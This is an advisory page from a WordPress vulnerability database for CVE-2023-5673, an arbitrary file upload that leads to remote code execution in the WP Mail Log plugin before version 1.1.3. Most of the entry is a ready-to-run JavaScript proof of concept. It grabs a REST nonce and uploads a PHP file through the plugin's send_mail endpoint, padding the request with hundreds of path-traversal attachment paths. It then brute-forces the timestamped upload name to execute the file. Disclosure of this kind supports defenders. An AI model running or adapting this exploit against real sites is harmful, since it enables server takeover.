WordPress Plugin Vulnerabilities

WP Mail Log < 1.1.3 – Contributor+ Arbitrary File Upload to RCE

Description

The plugin does not properly validate file extensions uploading files to attach to emails, allowing attackers to upload PHP files, leading to remote code execution.

Proof of Concept

Run the following JS code in any page on the server, setting the `id` variable to a valid ID of a log entry on the server.
---
var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();

// A valid ID for a log entry on the server.
var id = 1;

// Used to cancel the search for the uploaded file when the file upload request is finished and there was no match.
var uploadRequestFinished = null;

// Contains the local file path of all files inside wp-admin
// If you want to decrease/increase the delay, add/remove entries here.
var localAttachments = {"../../wp-admin/css/colors/blue/colors.css":1,"../../wp-admin/css/colors/blue/colors.min.css":1,"../../wp-admin/css/colors/blue/colors-rtl.css":1,"../../wp-admin/css/colors/blue/colors-rtl.min.css":1,"../../wp-admin/css/colors/blue/colors.scss":1,"../../wp-admin/css/colors/coffee/colors.css":1,"../../wp-admin/css/colors/coffee/colors.min.css":1,"../../wp-admin/css/colors/coffee/colors-rtl.css":1,"../../wp-admin/css/colors/coffee/colors-rtl.min.css":1,"../../wp-admin/css/colors/coffee/colors.scss":1,"../../wp-admin/css/colors/ectoplasm/colors.css":1,"../../wp-admin/css/colors/ectoplasm/colors.min.css":1,"../../wp-admin/css/colors/ectoplasm/colors-rtl.css":1,"../../wp-admin/css/colors/ectoplasm/colors-rtl.min.css":1,"../../wp-admin/css/colors/ectoplasm/colors.scss":1,"../../wp-admin/css/colors/light/colors.css":1,"../../wp-admin/css/colors/light/colors.min.css":1,"../../wp-admin/css/colors/light/colors-rtl.css":1,"../../wp-admin/css/colors/light/colors-rtl.min.css":1,"../../wp-admin/css/colors/light/colors.scss":1,"../../wp-admin/css/colors/midnight/colors.css":1,"../../wp-admin/css/colors/midnight/colors.min.css":1,"../../wp-admin/css/colors/midnight/colors-rtl.css":1,"../../wp-admin/css/colors/midnight/colors-rtl.min.css":1,"../../wp-admin/css/colors/midnight/colors.scss":1,"../../wp-admin/css/colors/modern/colors.css":1,"../../wp-admin/css/colors/modern/colors.min.css":1,"../../wp-admin/css/colors/modern/colors-rtl.css":1,"../../wp-admin/css/colors/modern/colors-rtl.min.css":1,"../../wp-admin/css/colors/modern/colors.scss":1,"../../wp-admin/css/colors/ocean/colors.css":1,"../../wp-admin/css/colors/ocean/colors.min.css":1,"../../wp-admin/css/colors/ocean/colors-rtl.css":1,"../../wp-admin/css/colors/ocean/colors-rtl.min.css":1,"../../wp-admin/css/colors/ocean/colors.scss":1,"../../wp-admin/css/colors/sunrise/colors.css":1,"../../wp-admin/css/colors/sunrise/colors.min.css":1,"../../wp-admin/css/colors/sunrise/colors-rtl.css":1,"../../wp-admin/css/colors/sunrise/colors-rtl.min.css":1,"../../wp-admin/css/colors/sunrise/colors.scss":1,"../../wp-admin/css/colors/_admin.scss":1,"../../wp-admin/css/colors/_mixins.scss":1,"../../wp-admin/css/colors/_variables.scss":1,"../../wp-admin/css/about.css":1,"../../wp-admin/css/about.min.css":1,"../../wp-admin/css/about-rtl.css":1,"../../wp-admin/css/about-rtl.min.css":1,"../../wp-admin/css/admin-menu.css":1,"../../wp-admin/css/admin-menu.min.css":1,"../../wp-admin/css/admin-menu-rtl.css":1,"../../wp-admin/css/admin-menu-rtl.min.css":1,"../../wp-admin/css/code-editor.css":1,"../../wp-admin/css/code-editor.min.css":1,"../../wp-admin/css/code-editor-rtl.css":1,"../../wp-admin/css/code-editor-rtl.min.css":1,"../../wp-admin/css/color-picker.css":1,"../../wp-admin/css/color-picker.min.css":1,"../../wp-admin/css/color-picker-rtl.css":1,"../../wp-admin/css/color-picker-rtl.min.css":1,"../../wp-admin/css/common.css":1,"../../wp-admin/css/common.min.css":1,"../../wp-admin/css/common-rtl.css":1,"../../wp-admin/css/common-rtl.min.css":1,"../../wp-admin/css/customize-controls.css":1,"../../wp-admin/css/customize-controls.min.css":1,"../../wp-admin/css/customize-controls-rtl.css":1,"../../wp-admin/css/customize-controls-rtl.min.css":1,"../../wp-admin/css/customize-nav-menus.css":1,"../../wp-admin/css/customize-nav-menus.min.css":1,"../../wp-admin/css/customize-nav-menus-rtl.css":1,"../../wp-admin/css/customize-nav-menus-rtl.min.css":1,"../../wp-admin/css/customize-widgets.css":1,"../../wp-admin/css/customize-widgets.min.css":1,"../../wp-admin/css/customize-widgets-rtl.css":1,"../../wp-admin/css/customize-widgets-rtl.min.css":1,"../../wp-admin/css/dashboard.css":1,"../../wp-admin/css/dashboard.min.css":1,"../../wp-admin/css/dashboard-rtl.css":1,"../../wp-admin/css/dashboard-rtl.min.css":1,"../../wp-admin/css/deprecated-media.css":1,"../../wp-admin/css/deprecated-media.min.css":1,"../../wp-admin/css/deprecated-media-rtl.css":1,"../../wp-admin/css/deprecated-media-rtl.min.css":1,"../../wp-admin/css/edit.css":1,"../../wp-admin/css/edit.min.css":1,"../../wp-admin/css/edit-rtl.css":1,"../../wp-admin/css/edit-rtl.min.css":1,"../../wp-admin/css/farbtastic.css":1,"../../wp-admin/css/farbtastic.min.css":1,"../../wp-admin/css/farbtastic-rtl.css":1,"../../wp-admin/css/farbtastic-rtl.min.css":1,"../../wp-admin/css/forms.css":1,"../../wp-admin/css/forms.min.css":1,"../../wp-admin/css/forms-rtl.css":1,"../../wp-admin/css/forms-rtl.min.css":1,"../../wp-admin/css/install.css":1,"../../wp-admin/css/install.min.css":1,"../../wp-admin/css/install-rtl.css":1,"../../wp-admin/css/install-rtl.min.css":1,"../../wp-admin/css/l10n.css":1,"../../wp-admin/css/l10n.min.css":1,"../../wp-admin/css/l10n-rtl.css":1,"../../wp-admin/css/l10n-rtl.min.css":1,"../../wp-admin/css/list-tables.css":1,"../../wp-admin/css/list-tables.min.css":1,"../../wp-admin/css/list-tables-rtl.css":1,"../../wp-admin/css/list-tables-rtl.min.css":1,"../../wp-admin/css/login.css":1,"../../wp-admin/css/login.min.css":1,"../../wp-admin/css/login-rtl.css":1,"../../wp-admin/css/login-rtl.min.css":1,"../../wp-admin/css/media.css":1,"../../wp-admin/css/media.min.css":1,"../../wp-admin/css/media-rtl.css":1,"../../wp-admin/css/media-rtl.min.css":1,"../../wp-admin/css/nav-menus.css":1,"../../wp-admin/css/nav-menus.min.css":1,"../../wp-admin/css/nav-menus-rtl.css":1,"../../wp-admin/css/nav-menus-rtl.min.css":1,"../../wp-admin/css/revisions.css":1,"../../wp-admin/css/revisions.min.css":1,"../../wp-admin/css/revisions-rtl.css":1,"../../wp-admin/css/revisions-rtl.min.css":1,"../../wp-admin/css/site-health.css":1,"../../wp-admin/css/site-health.min.css":1,"../../wp-admin/css/site-health-rtl.css":1,"../../wp-admin/css/site-health-rtl.min.css":1,"../../wp-admin/css/site-icon.css":1,"../../wp-admin/css/site-icon.min.css":1,"../../wp-admin/css/site-icon-rtl.css":1,"../../wp-admin/css/site-icon-rtl.min.css":1,"../../wp-admin/css/themes.css":1,"../../wp-admin/css/themes.min.css":1,"../../wp-admin/css/themes-rtl.css":1,"../../wp-admin/css/themes-rtl.min.css":1,"../../wp-admin/css/widgets.css":1,"../../wp-admin/css/widgets.min.css":1,"../../wp-admin/css/widgets-rtl.css":1,"../../wp-admin/css/widgets-rtl.min.css":1,"../../wp-admin/css/wp-admin.css":1,"../../wp-admin/css/wp-admin.min.css":1,"../../wp-admin/css/wp-admin-rtl.css":1,"../../wp-admin/css/wp-admin-rtl.min.css":1,"../../wp-admin/includes/admin-filters.php":1,"../../wp-admin/includes/admin.php":1,"../../wp-admin/includes/ajax-actions.php":1,"../../wp-admin/includes/bookmark.php":1,"../../wp-admin/includes/class-automatic-upgrader-skin.php":1,"../../wp-admin/includes/class-bulk-plugin-upgrader-skin.php":1,"../../wp-admin/includes/class-bulk-theme-upgrader-skin.php":1,"../../wp-admin/includes/class-bulk-upgrader-skin.php":1,"../../wp-admin/includes/class-core-upgrader.php":1,"../../wp-admin/includes/class-custom-background.php":1,"../../wp-admin/includes/class-custom-image-header.php":1,"../../wp-admin/includes/class-file-upload-upgrader.php":1,"../../wp-admin/includes/class-ftp.php":1,"../../wp-admin/includes/class-ftp-pure.php":1,"../../wp-admin/includes/class-ftp-sockets.php":1,"../../wp-admin/includes/class-language-pack-upgrader.php":1,"../../wp-admin/includes/class-language-pack-upgrader-skin.php":1,"../../wp-admin/includes/class-pclzip.php":1,"../../wp-admin/includes/class-plugin-installer-skin.php":1,"../../wp-admin/includes/class-plugin-upgrader.php":1,"../../wp-admin/includes/class-plugin-upgrader-skin.php":1,"../../wp-admin/includes/class-theme-installer-skin.php":1,"../../wp-admin/includes/class-theme-upgrader.php":1,"../../wp-admin/includes/class-theme-upgrader-skin.php":1,"../../wp-admin/includes/class-walker-category-checklist.php":1,"../../wp-admin/includes/class-walker-nav-menu-checklist.php":1,"../../wp-admin/includes/class-walker-nav-menu-edit.php":1,"../../wp-admin/includes/class-wp-ajax-upgrader-skin.php":1,"../../wp-admin/includes/class-wp-application-passwords-list-table.php":1,"../../wp-admin/includes/class-wp-automatic-updater.php":1,"../../wp-admin/includes/class-wp-comments-list-table.php":1,"../../wp-admin/includes/class-wp-community-events.php":1,"../../wp-admin/includes/class-wp-debug-data.php":1,"../../wp-admin/includes/class-wp-filesystem-base.php":1,"../../wp-admin/includes/class-wp-filesystem-direct.php":1,"../../wp-admin/includes/class-wp-filesystem-ftpext.php":1,"../../wp-admin/includes/class-wp-filesystem-ftpsockets.php":1,"../../wp-admin/includes/class-wp-filesystem-ssh2.php":1,"../../wp-admin/includes/class-wp-importer.php":1,"../../wp-admin/includes/class-wp-internal-pointers.php":1,"../../wp-admin/includes/class-wp-links-list-table.php":1,"../../wp-admin/includes/class-wp-list-table-compat.php":1,"../../wp-admin/includes/class-wp-list-table.php":1,"../../wp-admin/includes/class-wp-media-list-table.php":1,"../../wp-admin/includes/class-wp-ms-sites-list-table.php":1,"../../wp-admin/includes/class-wp-ms-themes-list-table.php":1,"../../wp-admin/includes/class-wp-ms-users-list-table.php":1,"../../wp-admin/includes/class-wp-plugin-install-list-table.php":1,"../../wp-admin/includes/class-wp-plugins-list-table.php":1,"../../wp-admin/includes/class-wp-post-comments-list-table.php":1,"../../wp-admin/includes/class-wp-posts-list-table.php":1,"../../wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php":1,"../../wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php":1,"../../wp-admin/includes/class-wp-privacy-policy-content.php":1,"../../wp-admin/includes/class-wp-privacy-requests-table.php":1,"../../wp-admin/includes/class-wp-screen.php":1,"../../wp-admin/includes/class-wp-site-health-auto-updates.php":1,"../../wp-admin/includes/class-wp-site-health.php":1,"../../wp-admin/includes/class-wp-site-icon.php":1,"../../wp-admin/includes/class-wp-terms-list-table.php":1,"../../wp-admin/includes/class-wp-theme-install-list-table.php":1,"../../wp-admin/includes/class-wp-themes-list-table.php":1,"../../wp-admin/includes/class-wp-upgrader.php":1,"../../wp-admin/includes/class-wp-upgrader-skin.php":1,"../../wp-admin/includes/class-wp-upgrader-skins.php":1,"../../wp-admin/includes/class-wp-users-list-table.php":1,"../../wp-admin/includes/comment.php":1,"../../wp-admin/includes/continents-cities.php":1,"../../wp-admin/includes/credits.php":1,"../../wp-admin/includes/dashboard.php":1,"../../wp-admin/includes/deprecated.php":1,"../../wp-admin/includes/edit-tag-messages.php":1,"../../wp-admin/includes/export.php":1,"../../wp-admin/includes/file.php":1,"../../wp-admin/includes/image-edit.php":1,"../../wp-admin/includes/image.php":1,"../../wp-admin/includes/import.php":1,"../../wp-admin/includes/list-table.php":1,"../../wp-admin/includes/media.php":1,"../../wp-admin/includes/menu.php":1,"../../wp-admin/includes/meta-boxes.php":1,"../../wp-admin/includes/misc.php":1,"../../wp-admin/includes/ms-admin-filters.php":1,"../../wp-admin/includes/ms-deprecated.php":1,"../../wp-admin/includes/ms.php":1,"../../wp-admin/includes/nav-menu.php":1,"../../wp-admin/includes/network.php":1,"../../wp-admin/includes/noop.php":1,"../../wp-admin/includes/options.php":1,"../../wp-admin/includes/plugin-install.php":1,"../../wp-admin/includes/plugin.php":1,"../../wp-admin/includes/post.php":1,"../../wp-admin/includes/privacy-tools.php":1,"../../wp-admin/includes/revision.php":1,"../../wp-admin/includes/schema.php":1,"../../wp-admin/includes/screen.php":1,"../../wp-admin/includes/taxonomy.php":1,"../../wp-admin/includes/template.php":1,"../../wp-admin/includes/theme-install.php":1,"../../wp-admin/includes/theme.php":1,"../../wp-admin/includes/translation-install.php":1,"../../wp-admin/includes/update-core.php":1,"../../wp-admin/includes/update.php":1,"../../wp-admin/includes/upgrade.php":1,"../../wp-admin/includes/user.php":1,"../../wp-admin/includes/widgets.php":1,"../../wp-admin/js/widgets/custom-html-widgets.js":1,"../../wp-admin/js/widgets/custom-html-widgets.min.js":1,"../../wp-admin/js/widgets/media-audio-widget.js":1,"../../wp-admin/js/widgets/media-audio-widget.min.js":1,"../../wp-admin/js/widgets/media-gallery-widget.js":1,"../../wp-admin/js/widgets/media-gallery-widget.min.js":1,"../../wp-admin/js/widgets/media-image-widget.js":1,"../../wp-admin/js/widgets/media-image-widget.min.js":1,"../../wp-admin/js/widgets/media-video-widget.js":1,"../../wp-admin/js/widgets/media-video-widget.min.js":1,"../../wp-admin/js/widgets/media-widgets.js":1,"../../wp-admin/js/widgets/media-widgets.min.js":1,"../../wp-admin/js/widgets/text-widgets.js":1,"../../wp-admin/js/widgets/text-widgets.min.js":1,"../../wp-admin/js/accordion.js":1,"../../wp-admin/js/accordion.min.js":1,"../../wp-admin/js/application-passwords.js":1,"../../wp-admin/js/application-passwords.min.js":1,"../../wp-admin/js/auth-app.js":1,"../../wp-admin/js/auth-app.min.js":1,"../../wp-admin/js/code-editor.js":1,"../../wp-admin/js/code-editor.min.js":1,"../../wp-admin/js/color-picker.js":1,"../../wp-admin/js/color-picker.min.js":1,"../../wp-admin/js/comment.js":1,"../../wp-admin/js/comment.min.js":1,"../../wp-admin/js/common.js":1,"../../wp-admin/js/common.min.js":1,"../../wp-admin/js/custom-background.js":1,"../../wp-admin/js/custom-background.min.js":1,"../../wp-admin/js/custom-header.js":1,"../../wp-admin/js/customize-controls.js":1,"../../wp-admin/js/customize-controls.min.js":1,"../../wp-admin/js/customize-nav-menus.js":1,"../../wp-admin/js/customize-nav-menus.min.js":1,"../../wp-admin/js/customize-widgets.js":1,"../../wp-admin/js/customize-widgets.min.js":1,"../../wp-admin/js/dashboard.js":1,"../../wp-admin/js/dashboard.min.js":1,"../../wp-admin/js/edit-comments.js":1,"../../wp-admin/js/edit-comments.min.js":1,"../../wp-admin/js/editor-expand.js":1,"../../wp-admin/js/editor-expand.min.js":1,"../../wp-admin/js/editor.js":1,"../../wp-admin/js/editor.min.js":1,"../../wp-admin/js/farbtastic.js":1,"../../wp-admin/js/gallery.js":1,"../../wp-admin/js/gallery.min.js":1,"../../wp-admin/js/image-edit.js":1,"../../wp-admin/js/image-edit.min.js":1,"../../wp-admin/js/inline-edit-post.js":1,"../../wp-admin/js/inline-edit-post.min.js":1,"../../wp-admin/js/inline-edit-tax.js":1,"../../wp-admin/js/inline-edit-tax.min.js":1,"../../wp-admin/js/iris.min.js":1,"../../wp-admin/js/language-chooser.js":1,"../../wp-admin/js/language-chooser.min.js":1,"../../wp-admin/js/link.js":1,"../../wp-admin/js/link.min.js":1,"../../wp-admin/js/media-gallery.js":1,"../../wp-admin/js/media-gallery.min.js":1,"../../wp-admin/js/media.js":1,"../../wp-admin/js/media.min.js":1,"../../wp-admin/js/media-upload.js":1,"../../wp-admin/js/media-upload.min.js":1,"../../wp-admin/js/nav-menu.js":1,"../../wp-admin/js/nav-menu.min.js":1,"../../wp-admin/js/password-strength-meter.js":1,"../../wp-admin/js/password-strength-meter.min.js":1,"../../wp-admin/js/password-toggle.js":1,"../../wp-admin/js/password-toggle.min.js":1,"../../wp-admin/js/plugin-install.js":1,"../../wp-admin/js/plugin-install.min.js":1,"../../wp-admin/js/postbox.js":1,"../../wp-admin/js/postbox.min.js":1,"../../wp-admin/js/post.js":1,"../../wp-admin/js/post.min.js":1,"../../wp-admin/js/privacy-tools.js":1,"../../wp-admin/js/privacy-tools.min.js":1,"../../wp-admin/js/revisions.js":1,"../../wp-admin/js/revisions.min.js":1,"../../wp-admin/js/set-post-thumbnail.js":1,"../../wp-admin/js/set-post-thumbnail.min.js":1,"../../wp-admin/js/site-health.js":1,"../../wp-admin/js/site-health.min.js":1,"../../wp-admin/js/svg-painter.js":1,"../../wp-admin/js/svg-painter.min.js":1,"../../wp-admin/js/tags-box.js":1,"../../wp-admin/js/tags-box.min.js":1,"../../wp-admin/js/tags.js":1,"../../wp-admin/js/tags.min.js":1,"../../wp-admin/js/tags-suggest.js":1,"../../wp-admin/js/tags-suggest.min.js":1,"../../wp-admin/js/theme.js":1,"../../wp-admin/js/theme.min.js":1,"../../wp-admin/js/theme-plugin-editor.js":1,"../../wp-admin/js/theme-plugin-editor.min.js":1,"../../wp-admin/js/updates.js":1,"../../wp-admin/js/updates.min.js":1,"../../wp-admin/js/user-profile.js":1,"../../wp-admin/js/user-profile.min.js":1,"../../wp-admin/js/user-suggest.js":1,"../../wp-admin/js/user-suggest.min.js":1,"../../wp-admin/js/widgets.js":1,"../../wp-admin/js/widgets.min.js":1,"../../wp-admin/js/word-count.js":1,"../../wp-admin/js/word-count.min.js":1,"../../wp-admin/js/xfn.js":1,"../../wp-admin/js/xfn.min.js":1,"../../wp-admin/maint/repair.php":1,"../../wp-admin/network/about.php":1,"../../wp-admin/network/admin.php":1,"../../wp-admin/network/contribute.php":1,"../../wp-admin/network/credits.php":1,"../../wp-admin/network/edit.php":1,"../../wp-admin/network/freedoms.php":1,"../../wp-admin/network/index.php":1,"../../wp-admin/network/menu.php":1,"../../wp-admin/network/plugin-editor.php":1,"../../wp-admin/network/plugin-install.php":1,"../../wp-admin/network/plugins.php":1,"../../wp-admin/network/privacy.php":1,"../../wp-admin/network/profile.php":1,"../../wp-admin/network/settings.php":1,"../../wp-admin/network/setup.php":1,"../../wp-admin/network/site-info.php":1,"../../wp-admin/network/site-new.php":1,"../../wp-admin/network/site-settings.php":1,"../../wp-admin/network/sites.php":1,"../../wp-admin/network/site-themes.php":1,"../../wp-admin/network/site-users.php":1,"../../wp-admin/network/theme-editor.php":1,"../../wp-admin/network/theme-install.php":1,"../../wp-admin/network/themes.php":1,"../../wp-admin/network/update-core.php":1,"../../wp-admin/network/update.php":1,"../../wp-admin/network/upgrade.php":1,"../../wp-admin/network/user-edit.php":1,"../../wp-admin/network/user-new.php":1,"../../wp-admin/network/users.php":1,"../../wp-admin/user/about.php":1,"../../wp-admin/user/admin.php":1,"../../wp-admin/user/credits.php":1,"../../wp-admin/user/freedoms.php":1,"../../wp-admin/user/index.php":1,"../../wp-admin/user/menu.php":1,"../../wp-admin/user/privacy.php":1,"../../wp-admin/user/profile.php":1,"../../wp-admin/user/user-edit.php":1,"../../wp-admin/about.php":1,"../../wp-admin/admin-ajax.php":1,"../../wp-admin/admin-footer.php":1,"../../wp-admin/admin-functions.php":1,"../../wp-admin/admin-header.php":1,"../../wp-admin/admin.php":1,"../../wp-admin/admin-post.php":1,"../../wp-admin/async-upload.php":1,"../../wp-admin/authorize-application.php":1,"../../wp-admin/comment.php":1,"../../wp-admin/contribute.php":1,"../../wp-admin/credits.php":1,"../../wp-admin/custom-background.php":1,"../../wp-admin/custom-header.php":1,"../../wp-admin/customize.php":1,"../../wp-admin/edit-comments.php":1,"../../wp-admin/edit-form-advanced.php":1,"../../wp-admin/edit-form-blocks.php":1,"../../wp-admin/edit-form-comment.php":1,"../../wp-admin/edit-link-form.php":1,"../../wp-admin/edit.php":1,"../../wp-admin/edit-tag-form.php":1,"../../wp-admin/edit-tags.php":1,"../../wp-admin/erase-personal-data.php":1,"../../wp-admin/export-personal-data.php":1,"../../wp-admin/export.php":1,"../../wp-admin/freedoms.php":1,"../../wp-admin/import.php":1,"../../wp-admin/index.php":1,"../../wp-admin/install-helper.php":1,"../../wp-admin/install.php":1,"../../wp-admin/link-add.php":1,"../../wp-admin/link-manager.php":1,"../../wp-admin/link-parse-opml.php":1,"../../wp-admin/link.php":1,"../../wp-admin/load-scripts.php":1,"../../wp-admin/load-styles.php":1,"../../wp-admin/media-new.php":1,"../../wp-admin/media.php":1,"../../wp-admin/media-upload.php":1,"../../wp-admin/menu-header.php":1,"../../wp-admin/menu.php":1,"../../wp-admin/moderation.php":1,"../../wp-admin/ms-admin.php":1,"../../wp-admin/ms-delete-site.php":1,"../../wp-admin/ms-edit.php":1,"../../wp-admin/ms-options.php":1,"../../wp-admin/ms-sites.php":1,"../../wp-admin/ms-themes.php":1,"../../wp-admin/ms-upgrade-network.php":1,"../../wp-admin/ms-users.php":1,"../../wp-admin/my-sites.php":1,"../../wp-admin/nav-menus.php":1,"../../wp-admin/network.php":1,"../../wp-admin/options-discussion.php":1,"../../wp-admin/options-general.php":1,"../../wp-admin/options-head.php":1,"../../wp-admin/options-media.php":1,"../../wp-admin/options-permalink.php":1,"../../wp-admin/options.php":1,"../../wp-admin/options-privacy.php":1,"../../wp-admin/options-reading.php":1,"../../wp-admin/options-writing.php":1,"../../wp-admin/plugin-editor.php":1,"../../wp-admin/plugin-install.php":1,"../../wp-admin/plugins.php":1,"../../wp-admin/post-new.php":1,"../../wp-admin/post.php":1,"../../wp-admin/press-this.php":1,"../../wp-admin/privacy.php":1,"../../wp-admin/privacy-policy-guide.php":1,"../../wp-admin/profile.php":1,"../../wp-admin/revision.php":1,"../../wp-admin/setup-config.php":1,"../../wp-admin/site-editor.php":1,"../../wp-admin/site-health-info.php":1,"../../wp-admin/site-health.php":1,"../../wp-admin/term.php":1,"../../wp-admin/theme-editor.php":1,"../../wp-admin/theme-install.php":1,"../../wp-admin/themes.php":1,"../../wp-admin/tools.php":1,"../../wp-admin/update-core.php":1,"../../wp-admin/update.php":1,"../../wp-admin/upgrade-functions.php":1,"../../wp-admin/upgrade.php":1,"../../wp-admin/upload.php":1,"../../wp-admin/user-edit.php":1,"../../wp-admin/user-new.php":1,"../../wp-admin/users.php":1,"../../wp-admin/widgets-form-blocks.php":1,"../../wp-admin/widgets-form.php":1,"../../wp-admin/widgets.php":1};

/**
 * Calls the REST endpoint to upload the PHP file
 */
var uploadFile = () => {

  let body = new FormData();
  
  // The uploaded PHP file
  // The copy command was added to ensure that a PHP file exists even if the server deleted the original PHP file
  let phpFile = new File(
    ["<?php if(isset($_GET['copy'])){copy(__FILE__,__DIR__.'/index.php');}echo 'Hello';"],
    'hello.php'
  );

  body.append( 'to_email', 'exmaple@localhost.com' );
  body.append( 'id', id );
  body.append( 'hello', phpFile );
  body.append( 'includeAttachment', JSON.stringify( localAttachments ) );

  // Change the domain here
  fetch("/wp-json/wml/v1/wml_logs/send_mail", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Upgrade-Insecure-Requests": "1",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "X-WP-Nonce": nonce
    },
    "method": "POST",
    "mode": "cors",
    "body": body
  }).then(
    rsp => {
      uploadRequestFinished = true;
    }
  );
}

/**
 * Searches for the uploaded PHP file
 * 
 * If the processing power is available, this function can be changed to perform the search in parallel.
 * 
 * But beware, it may freeze your browser or computer
 * 
 * @param {integer} startTime 
 */
var callUploadedFile = startTime => {

  /*
  const protocol = `${window.location.protocol}//`;
  const host = window.location.host;
  */

  fetch(
    `/wp-content/uploads/${startTime}.php?copy`
  ).then(
    rsp => {
      if ( null !== uploadRequestFinished ) {
        console.log( 'Failed to call uploaded file' );
      } else if ( ! rsp.ok ) {
        callUploadedFile( startTime+1 );
      } else {
        console.log( 'Called uploaded file. You can now call the index.php inside the uploads folder.' );
      }
    }
  )
}

/**
 * Starts the exploit process
 */
function exploit() {

  let startTime = Number( String( Date.now() ).slice(0,10) );

  uploadFile();

  // Gives the server a little time to set up the upload request. It may be necessary to decrease/increase the delay
  setTimeout(
    () => {
      callUploadedFile( startTime );  
    },
    1000
  )
}

exploit();

Affects Plugins

Plugin icon
wp-mail-log
Fixed in 1.1.3

References

CVE
CVE-2023-5673

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
231f72bf-9ad0-417e-b7a0-3555875749e9

Timeline

Publicly Published
2023-11-28 (about 5 months ago)
Added
2023-11-28 (about 5 months ago)
Last Updated
2023-11-28 (about 5 months ago)

Other

Published
Title
Published
2014-08-01
Title
Magn WP Drag & Drop <= 1.1.4 - Upload Shell Upload
Published
2012-06-01
Title
Gallery 3.06 - Unauthenticated File Upload PHP Code Execution
Published
2014-10-06
Title
Infusionsoft Gravity Forms 1.5.3 - 1.5.10 Arbitrary File Upload
Published
2023-11-20
Title
WP Child Theme Generator <= 1.1.0 - Admin+ Arbitrary File Upload
Published
2014-08-01
Title
Category Grid View Gallery 0.1.1 - Shell Upload